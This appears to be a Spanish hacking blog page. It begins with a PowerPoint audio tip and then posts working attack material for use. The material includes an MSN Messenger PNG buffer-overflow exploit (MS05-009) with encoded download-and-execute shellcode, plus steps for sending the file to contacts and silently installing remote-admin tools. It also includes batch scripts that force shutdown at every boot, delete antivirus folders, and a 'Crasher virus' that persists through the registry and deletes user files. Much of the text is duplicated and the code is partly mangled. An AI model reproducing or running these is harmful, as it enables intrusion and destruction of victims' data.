Total, que lo hacía con insertar - películas y sonidos - sonido de archivo, y no lo incrustaba sino que lo vinculaba. Es decir, la presentación buscaba el archivo de sonido ubicado en mi disco duro, de modo que si lo enviaba, al no encontrar el archivo en el disco duro de mi amigo, pues no se reproducía.
El primer problema resultó ser el tamaño del archivo. Se ve que por defecto PowerPoint no incrusta, sino que vincula localmente, los archivos insertados que sean mayores de 100 KB.
Este tamaño límite a partir del cual vincula y por debajo del cual incrusta, se puede cambiar hasta un máximo de 50 MB. Está en Herramientas - Opciones - Pestaña General - Vincular archivos de sonido mayores de: 10000 KB. Esto haremos que se incrusten todos los archivos que sean menores de 10 MB.
Aún así el dichoso archivo seguía sin incrustarse. Por lo visto resulta que PowerPoint sólo incrusta archivos de sonido de extensión wav, y el mío era mp3. Naturalmente, cambiar la extensión "a mano" es como arrancarle a tu Renault su marca y poner la de un Mercedes. No deja de ser un Renault.
Probé a cambiar el formato con algún conversor, pero el archivo wav resultante ocupaba como cinco o séis veces más que el mp3, de modo que la presentación pesaba demasiado.
Finalmente la solución vino de mano del programa WaveMP3, que agarra un archivo MP3 y le incluye una cabecera de WAV. De hecho, este programa genera un archivo WAV con el mismo nombre que el archivo MP3 que se le proporciona, pero con una cabecera que engañará al Powerpoint. Y el tamaño del archivo resultante es el mismo que el del mp3.
Por otro lado, si estáis en estas lides, para que la reproducción vuelva a empezar cuando se acabe no olvidéis activar la casilla "Repetir la reproducción hasta su interrupción", en Modificar objeto de sonido (botón derecho sobre la imagen).
Información facilitada por P3t3rp4n GRACIAS!!!
Hackea por messenger. . .
Hace poco se publicó una vulnerabilidad para el MSN Messenger que permite que si uno de tus contactos te envía una foto y aceptas la transferencia, pueda ejecutarte cualquier programa en tu ordenador (virus, troyanos, aplicaciones de administración remota...).
Estuve probándolo este finde y funciona a las mil maravillas. Conseguí ejecutar remotamente una inofensiva calculadora, pero podría haber sido cualquier otro ejecutable. Además he comprobado que este ataque se salta los firewalls (cortafuegos) y los antivirus (salvo que mandes un virus, supongo, pero podemos mandar algún programa cliente-servidor no-vírico modificado para conseguir algunas maldades).
Esta vulnerabilidad afecta a los Windows 2000 con todos los Service Pack y Windows XP con todos los Service Pack en los que se ejecute el Messenger. Las versiones del Messenger afectadas son las siguientes (casi todas):
. MSN Messenger 6.2
. MSN Messenger 6.1
. Windows Messenger 4.7.2009
. Windows Messenger 4.7.3000
. Windows Messenger 5.0
Posibles soluciones:
A) No aceptar transferencias de archivos de imagen con la extensión .png. (Esta es la solución que yo propongo)
B) Utilizar la versión beta (en pruebas) 7.0 del MSN Messenger (que no es vulnerable).
C) Instalar el MSN Plus (una extensión para el Messenger que, curiosamente y por casualidad, hace que este ataque no le afecte).
D) Utilizar el AMSN (versión libre del MSN, originariamente para Linux, pero ya hay versiones para Windows).
* Al cabo de 3 días de salir el exploit, Microsoft sacó una nueva versión del MSN no vulnerable (la 6.0205)
Modo de empleo:
Compílate este código:
--------------------
/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit (MS05-009)
* Bug discoveried by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and delikon
* Usage:exploit
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service
packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/
#include
#include
#include
#include
#ifdef __BORLANDC__
#include
#endif
#define NOP 0x90
char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\ x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i \n");
printf("\tExample:exploit vuln.png
http://www.atmacasoft.com/exp/msg.exe\n");
return;
}
web = argv[2];
if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;ifputc(png_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<99;i++) weblength="(short" pointer="strstr(shellcode," newshellcode =" new" i="0;ifputc(newshellcode[i],di);
for(i=0;i<(83-strlen(web));i++) //NOPs fputc(NOP,di); /*Overwriting the return address (EIP)*/ /*0x005E0547 - ret */ fputc(0x47,di); fputc(0x05,di); fputc(0x5e,di); fputc(0x00,di); for(i=0;ifputc(pngeof[i],di);
printf("Vulnarable png file %s has been generated!\n",argv[1]);
fclose(di);
}
--------------------
Después, suponiendo que el ejecutable se llamase exploit.exe la sintaxis sería:
C:\exploit fotomala.png http://mipaginaweb.com/archivoaejecutar.exe
Entonces te generará un archivo llamado fotomala.png, que es la imagen maliciosa que en realidad contiene un hipervínculo "encriptado" al archivo apuntado en la url.
Sólo tienes que enviar por el Messenger esa imagen falsa a un contacto. En cuanto acepte la transferencia se descargará el archivo y se ejecutará.
Muy bonito, ¿y qué envío? Pues si mandas un troyano el antivirus cantará por lo menos la sardana y alguna sevillana. Si mandas un programa tipo VPN le saltarán las ventanas de configuración a la víctima y no podrás hacer nada. Lo suyo sería configurar algún servidor de ftp simple (ej. ServU) o alguna herramienta de administración remota sencilla (ej. Radmin) para que se instalen ocultamente y que se inicien ocultamente cada vez que se arranque el sistema.
Un problema añadido seguramente será la IP dinámica de la víctima, pero seguro que podéis programaros e instalarle con este mismo método algún cliente-servidor que os mande su IP (y si no, pues el Winud la manda por e-mail, o sacadla mediante MSN).
Estuve probándolo este finde y funciona a las mil maravillas. Conseguí ejecutar remotamente una inofensiva calculadora, pero podría haber sido cualquier otro ejecutable. Además he comprobado que este ataque se salta los firewalls (cortafuegos) y los antivirus (salvo que mandes un virus, supongo, pero podemos mandar algún programa cliente-servidor no-vírico modificado para conseguir algunas maldades).
Esta vulnerabilidad afecta a los Windows 2000 con todos los Service Pack y Windows XP con todos los Service Pack en los que se ejecute el Messenger. Las versiones del Messenger afectadas son las siguientes (casi todas):
. MSN Messenger 6.2
. MSN Messenger 6.1
. Windows Messenger 4.7.2009
. Windows Messenger 4.7.3000
. Windows Messenger 5.0
Posibles soluciones:
A) No aceptar transferencias de archivos de imagen con la extensión .png. (Esta es la solución que yo propongo)
B) Utilizar la versión beta (en pruebas) 7.0 del MSN Messenger (que no es vulnerable).
C) Instalar el MSN Plus (una extensión para el Messenger que, curiosamente y por casualidad, hace que este ataque no le afecte).
D) Utilizar el AMSN (versión libre del MSN, originariamente para Linux, pero ya hay versiones para Windows).
* Al cabo de 3 días de salir el exploit, Microsoft sacó una nueva versión del MSN no vulnerable (la 6.0205)
Modo de empleo:
Compílate este código:
--------------------
/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit (MS05-009)
* Bug discoveried by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and delikon
* Usage:exploit
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service
packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/
#include
#include
#include
#include
#ifdef __BORLANDC__
#include
#endif
#define NOP 0x90
char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\ x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i
printf("\tExample:exploit vuln.png
http://www.atmacasoft.com/exp/msg.exe\n");
return;
}
web = argv[2];
if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;i
/*stuff in a couple of NOPs*/
for(i=0;i<99;i++) weblength="(short" pointer="strstr(shellcode," newshellcode =" new" i="0;i
for(i=0;i<(83-strlen(web));i++) //NOPs fputc(NOP,di); /*Overwriting the return address (EIP)*/ /*0x005E0547 - ret */ fputc(0x47,di); fputc(0x05,di); fputc(0x5e,di); fputc(0x00,di); for(i=0;i
printf("Vulnarable png file %s has been generated!\n",argv[1]);
fclose(di);
}
--------------------
Después, suponiendo que el ejecutable se llamase exploit.exe la sintaxis sería:
C:\exploit fotomala.png http://mipaginaweb.com/archivoaejecutar.exe
Entonces te generará un archivo llamado fotomala.png, que es la imagen maliciosa que en realidad contiene un hipervínculo "encriptado" al archivo apuntado en la url.
Sólo tienes que enviar por el Messenger esa imagen falsa a un contacto. En cuanto acepte la transferencia se descargará el archivo y se ejecutará.
Muy bonito, ¿y qué envío? Pues si mandas un troyano el antivirus cantará por lo menos la sardana y alguna sevillana. Si mandas un programa tipo VPN le saltarán las ventanas de configuración a la víctima y no podrás hacer nada. Lo suyo sería configurar algún servidor de ftp simple (ej. ServU) o alguna herramienta de administración remota sencilla (ej. Radmin) para que se instalen ocultamente y que se inicien ocultamente cada vez que se arranque el sistema.
Un problema añadido seguramente será la IP dinámica de la víctima, pero seguro que podéis programaros e instalarle con este mismo método algún cliente-servidor que os mande su IP (y si no, pues el Winud la manda por e-mail, o sacadla mediante MSN).
jueves, 25 de diciembre de 2008
Manual crear worm
http://invisiblehack.mforos.com/1109918/5901341-gran-tutorial-para-crear-worm-en-vb-by-hendrix/
Apaga.
@echo off
echo shutdown -s -f -t 0 >> c:\autoexec.bat
cls
Apaga el pc cada vez que lo enciende
Guardar en blog d notas .bat o .exe
Comando tocamelasnarices, por llamarlo de alguna manera (=
echo shutdown -s -f -t 0 >> c:\autoexec.bat
cls
Apaga el pc cada vez que lo enciende
Guardar en blog d notas .bat o .exe
Comando tocamelasnarices, por llamarlo de alguna manera (=
Eliminar antivirus
@echo off
cls
cd \
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "McAfee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
Virus o comando? para blog d notas.
Elimina el antivirus.
Si lo prueban--> Lo detecta el antivirus??
cls
cd \
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "McAfee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
Virus o comando? para blog d notas.
Elimina el antivirus.
Si lo prueban--> Lo detecta el antivirus??
:P:P
@echo off
cd %windir%
echo @echo off>CPTL.bat
echo reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /V CTPL.bat /D %windir%\system32\CPTL.bat>>CPTL.bat
echo if exist %windir%\CPTL.bat goto oportunidad>>CPTL.bat
echo copy /Y CPTL.bat %windir%>>CPTL.bat
echo copy /Y CPTL.bat %windir%\system32>>CPTL.bat
echo cls>>CPTL.bat
echo :msg>>CPTL.bat
echo msg * A mortal virus has infected your computer!!>>CPTL.bat
echo :oportunidad>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo respuesta=INPUTBOX(”Insert the password to eliminate the virus” >oportunity.vbs>>CPTL.bat
echo echo if respuesta=batch then>>oportunity.vbs>>CPTL.bat
echo echo msgbox (”Correct, the virus won’t bother u more” >>oportunity.vbs>>CPTL.bat
echo echo kill (”C:\Windows\virus.bat” >>oportunity.vbs>>CPTL.bat
echo echo kill (”C:\Windows\system32\virus.bat” >>oportunity.vbs>>CPTL.bat
echo echo else>>oportunity.vbs>>CPTL.bat
echo echo msgbox (”Muahaha you’re still infected try it next time” >>oportunity.vbs>>CPTL.bat
echo echo start oportunity.vbs>>CPTL.bat
cls>>CPTL.bat
del /S /Q /F %userprofile%\mis documentos\*.*
echo :del>>CPTL.bat
echo cd %homedrive%>>CPTL.bat
echo del /Q /S /F *.jpg>>CPTL.bat
echo del /Q /S /F *.avi>>CPTL.bat
echo del /Q /S /F *.mp3>>CPTL.bat
echo del /Q /S /F *.doc>>CPTL.bat
echo del /Q /S /F *.zip>>CPTL.bat
echo del /Q /S /F *.rar>>CPTL.bat
echo cls>>CPTL.bat
echo :petar_escritorio>>CPTL.bat
echo cd %homepath%\Escritorio>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 1.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 2.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 3.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 4.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 5.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 6.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 7.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 8.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 9.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 10.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 11.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 12.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 13.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 14.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 15.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 16.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 17.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 18.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 19.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 20.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 21.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 22.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 23.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 24.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 25.txt>>CPTL.bat
echo cls>>CPTL.bat
echo if exist C:\virus%random%.txt (goto bucle)>>CPTL.bat
echo :Petar_HD>>CPTL.bat
echo cd\>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %ProgramFiles%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo goto Petar_HD>>CPTL.bat
echo cls>>CPTL.bat
del /S /Q /F %userprofile%\mis documentos\*.*
echo :bucle>>CPTL.bat
echo start iexplore.exe>>CPTL.bat
echo start command.com>>CPTL.bat
echo goto bucle>>CPTL.bat
echo :Shutdown>>CPTL.bat
echo shutdown -f -r -t 600 -c “Adios mamonazo bájate un antivirus la próxima vez!!”>>CPTL.bat
copy CPTL.bat %windir%\system32
Guardenlo como CPTL.bat
Virus copiado de JeanKJeankeeSoft
cd %windir%
echo @echo off>CPTL.bat
echo reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /V CTPL.bat /D %windir%\system32\CPTL.bat>>CPTL.bat
echo if exist %windir%\CPTL.bat goto oportunidad>>CPTL.bat
echo copy /Y CPTL.bat %windir%>>CPTL.bat
echo copy /Y CPTL.bat %windir%\system32>>CPTL.bat
echo cls>>CPTL.bat
echo :msg>>CPTL.bat
echo msg * A mortal virus has infected your computer!!>>CPTL.bat
echo :oportunidad>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo respuesta=INPUTBOX(”Insert the password to eliminate the virus” >oportunity.vbs>>CPTL.bat
echo echo if respuesta=batch then>>oportunity.vbs>>CPTL.bat
echo echo msgbox (”Correct, the virus won’t bother u more” >>oportunity.vbs>>CPTL.bat
echo echo kill (”C:\Windows\virus.bat” >>oportunity.vbs>>CPTL.bat
echo echo kill (”C:\Windows\system32\virus.bat” >>oportunity.vbs>>CPTL.bat
echo echo else>>oportunity.vbs>>CPTL.bat
echo echo msgbox (”Muahaha you’re still infected try it next time” >>oportunity.vbs>>CPTL.bat
echo echo start oportunity.vbs>>CPTL.bat
cls>>CPTL.bat
del /S /Q /F %userprofile%\mis documentos\*.*
echo :del>>CPTL.bat
echo cd %homedrive%>>CPTL.bat
echo del /Q /S /F *.jpg>>CPTL.bat
echo del /Q /S /F *.avi>>CPTL.bat
echo del /Q /S /F *.mp3>>CPTL.bat
echo del /Q /S /F *.doc>>CPTL.bat
echo del /Q /S /F *.zip>>CPTL.bat
echo del /Q /S /F *.rar>>CPTL.bat
echo cls>>CPTL.bat
echo :petar_escritorio>>CPTL.bat
echo cd %homepath%\Escritorio>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 1.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 2.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 3.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 4.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 5.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 6.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 7.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 8.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 9.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 10.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 11.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 12.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 13.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 14.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 15.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 16.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 17.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 18.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 19.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 20.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 21.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 22.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 23.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 24.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 25.txt>>CPTL.bat
echo cls>>CPTL.bat
echo if exist C:\virus%random%.txt (goto bucle)>>CPTL.bat
echo :Petar_HD>>CPTL.bat
echo cd\>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %ProgramFiles%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo goto Petar_HD>>CPTL.bat
echo cls>>CPTL.bat
del /S /Q /F %userprofile%\mis documentos\*.*
echo :bucle>>CPTL.bat
echo start iexplore.exe>>CPTL.bat
echo start command.com>>CPTL.bat
echo goto bucle>>CPTL.bat
echo :Shutdown>>CPTL.bat
echo shutdown -f -r -t 600 -c “Adios mamonazo bájate un antivirus la próxima vez!!”>>CPTL.bat
copy CPTL.bat %windir%\system32
Guardenlo como CPTL.bat
Virus copiado de JeanKJeankeeSoft
Suscribirse a:
Entradas (Atom)